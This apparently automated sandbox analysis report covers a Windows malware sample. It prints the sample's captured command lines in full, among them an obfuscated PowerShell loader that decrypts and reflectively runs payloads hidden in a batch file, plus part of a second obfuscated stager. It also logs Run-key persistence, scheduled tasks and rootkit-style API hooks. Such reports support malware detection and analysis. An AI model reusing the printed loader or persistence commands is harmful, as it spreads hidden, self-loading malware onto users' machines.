Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+'eTy'+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+'n'+'s'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WLjbMWfHUpI.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',Pu'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uwMlljVVwbVUVD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');$WLjbMWfHUpI.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'ew'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+'i'+'rt'+'u'+''+[Char](97)+''+[Char](108)+'',$qJfzFIqcrY,$uwMlljVVwbVUVD).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $WLjbMWfHUpI.CreateType();}$ulnmlpDbsuVQN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+'o'+'s'+[Char](111)+'f'+[Char](116)+''+[Char](46)+'Wi'+'n'+'3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+'a'+'t'+'i'+''+[Char](118)+'eM'+[Char](101)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C21E3C LoadLibraryA,GetProcAddress,Sleep, 18_2_0000022123C21E3C
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\cmd.exe Code function: 18_3_0000022123C0A7DD push rcx; retf 003Fh 18_3_0000022123C0A7DE
Source: C:\Windows\System32\cmd.exe Code function: 18_3_0000022123BDA7DD push rcx; retf 003Fh 18_3_0000022123BDA7DE
Source: C:\Windows\System32\conhost.exe Code function: 19_3_0000013F081DA7DD push rcx; retf 003Fh 19_3_0000013F081DA7DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFD9B80B05C push esp; retf 35_2_00007FFD9B80B05D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFD9B805EF7 push esp; retf 35_2_00007FFD9B805EF8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFD9B8000AD pushad ; iretd 35_2_00007FFD9B8000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFD9B8D79C9 push ebx; ret 35_2_00007FFD9B8D79CA
Source: C:\Windows\System32\conhost.exe Code function: 36_3_000001FD1777A7DD push rcx; retf 003Fh 36_3_000001FD1777A7DE
Source: C:\Windows\System32\dllhost.exe Code function: 37_3_0000017C6DA9A7DD push rcx; retf 003Fh 37_3_0000017C6DA9A7DE
Source: C:\Windows\System32\winlogon.exe Code function: 38_3_00000225DC62A7DD push rcx; retf 003Fh 38_3_00000225DC62A7DE
Source: C:\Windows\System32\lsass.exe Code function: 39_3_00000202C0ACA7DD push rcx; retf 003Fh 39_3_00000202C0ACA7DE
Source: C:\Windows\System32\svchost.exe Code function: 40_3_000002A6612EA7DD push rcx; retf 003Fh 40_3_000002A6612EA7DE
Source: C:\Windows\System32\dwm.exe Code function: 41_3_000002BAAEDDA7DD push rcx; retf 003Fh 41_3_000002BAAEDDA7DE
Source: C:\Windows\System32\dwm.exe Code function: 41_3_000002BAAEDAA7DD push rcx; retf 003Fh 41_3_000002BAAEDAA7DE
Source: C:\Windows\System32\wbem\WMIADAP.exe Code function: 42_3_0000027052A2A7DD push rcx; retf 003Fh 42_3_0000027052A2A7DE

Boot Survival
barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Creates autostart registry keys with suspicious names
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Creates job files (autostart)
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\System32\Tasks\$rbx-U7ejKPED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Hooks files or directories query functions (used to hide files and directories)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Hooks processes query functions (used to hide processes)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Stores large binary data to the registry
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
